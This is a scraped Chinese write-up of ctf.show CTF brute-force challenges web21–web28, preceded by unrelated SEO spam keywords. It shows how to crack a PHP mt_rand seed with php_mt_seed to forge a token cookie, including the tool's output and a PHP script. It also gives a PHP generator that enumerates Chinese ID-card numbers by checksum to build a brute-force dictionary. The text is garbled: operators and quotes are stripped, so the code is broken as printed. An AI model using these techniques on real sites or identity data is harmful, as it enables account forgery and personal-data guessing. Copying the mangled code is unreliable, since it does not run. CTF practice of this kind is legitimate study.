温州网站建设哪家好,国际军事新闻视频直播,辽宁建设工程信息网投标流程视频,网站十大品牌SSS web21_爆破什么的#xff0c;都是基操web22_域名也可以爆破的#xff0c;试试爆破这个ctf.show的子域名web23_还爆破#xff1f;这么多代码#xff0c;告辞#xff01;web24_爆个#x1f528;web25_爆个#x1f528;#xff0c;不爆了web26_这个可以爆web27_CTFsho… SSS web21_爆破什么的都是基操web22_域名也可以爆破的试试爆破这个ctf.show的子域名web23_还爆破这么多代码告辞web24_爆个web25_爆个不爆了web26_这个可以爆web27_CTFshow菜鸡学院招生啦web28_大海捞针 web21_爆破什么的都是基操 web22_域名也可以爆破的试试爆破这个ctf.show的子域名 web23_还爆破这么多代码告辞 使用php爆破web24_爆个 按照随机数种子规则进行脚本编写注意php版本不同运行随机数种子的结果也会有所不同。web25_爆个不爆了 https://www.openwall.com/php_mt_seed/ https://www.cnblogs.com/zaqzzz/p/9997855.html mt_scrand(seed)这个函数的意思是通过分发seed种子然后种子有了后靠mt_rand()生成随机 数。 在之前自己还以为需要暴力破解cookie,最后师傅们给我介绍了一个脚本专门用来跑mt_srand()种子和 mt_rand()随机数的 这里自己解释一下为什么每一次的mt_rand()mt_rand()不是第一次的随机数相加 因为生成的随机数可以说是一个线性变换实际上非常复杂的每一次的确定的但是每一次是不一样的所以不能 进行第一次*2就得到mt_rand()mt_rand() 使用说只要我们得到种子就可以在本地进行获得自己想要的值 解题通过随机数来寻找种子 我们让 ?r0 得到随机数。这里我得到的是 183607393 每一次不一样(因为flag值在变化) 然后下载 php_mt_seed4.0 我们在linux下面使用 gcc进行编译 gcc php_mt_seed.c -o php_mt_seed 之后运行脚本添加随机数 ./php_mt_seed 183607393找到对应的版本这里自己的运气好第一个出来的自己验证了一下发现就是这个 注可能存在多个种子需要自己进行判断 通过种子找到第一个随机数就是上面的随机数。payload ?r183607393 Cookie: token794171094使用php_mt_seed解析随机数种子下载并且make编译后使用。┌──(root?kali)-[/data/tools/php_mt_seed-4.0]
└─# time ./php_mt_seed 1432475889
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xac000000 - 0xafffffff, speed 12546.4 Mseeds/s
seed 0xad49eaf6 2907302646 (PHP 3.0.7 to 5.2.0)
seed 0xad49eaf7 2907302647 (PHP 3.0.7 to 5.2.0)
Found 2, trying 0xfc000000 - 0xffffffff, speed 12811.7 Mseeds/s
Version: 5.2.1
Found 2, trying 0x08000000 - 0x09ffffff, speed 130.3 Mseeds/s
seed 0x081a9537 135959863 (PHP 5.2.1 to 7.0.x; HHVM)
Found 3, trying 0x32000000 - 0x33ffffff, speed 149.0 Mseeds/s
seed 0x323b389c 842741916 (PHP 5.2.1 to 7.0.x; HHVM)
Found 4, trying 0x36000000 - 0x37ffffff, speed 149.3 Mseeds/s
seed 0x36029329 906138409 (PHP 5.2.1 to 7.0.x; HHVM)
Found 5, trying 0x46000000 - 0x47ffffff, speed 149.6 Mseeds/s
seed 0x47d7e597 1205331351 (PHP 5.2.1 to 7.0.x; HHVM)
seed 0x47d7e597 1205331351 (PHP 7.1.0)
Found 7, trying 0xfe000000 - 0xffffffff, speed 136.8 Mseeds/s
Found 7real 31.77s
user 125.93s
sys 0.07s
cpu 396%
?php $r 0;mt_srand(0x47d7e597);echo 随机数种子0x47d7e597\n ;$rand1 mt_rand();echo 第一个随机数$rand1\n ;$randRet intval($r)-intval($rand1) ;echo $randRet ;$rand23 mt_rand()mt_rand();echo 第二三个随机数之和 $rand23\n ;?web26_这个可以爆 web27_CTFshow菜鸡学院招生啦 # 身份证遍历算法制作成字典?php $card array();for ($y1990; $y 2000; $y) { for ($m0; $m 13; $m) { if ($m10) {$m0.$m;}for ($d0; $d 32 ; $d) { if ($d 10) {$d0.$d;}array_push($card, 621022.$y.$m.$d.5237);}}}function checkCard($c) {$list [7,9,10,5,8,4,2,1,6,3,7,9,10,5,8,4,2];$crc [1,0,X,9,8,7,6,5,4,3,2];$ca str_split($c);$sum 0;for ($i0; $i count($ca); $i) { $sum $ca[$i]*$list[$i];}$crc_ $sum%11;if ($ca[count($ca)-1]$crc[$crc_]) {return true;} else {return false;}}foreach ($card as $c) {if (checkCard($c)) {echo $c.br ;}}?web28_大海捞针
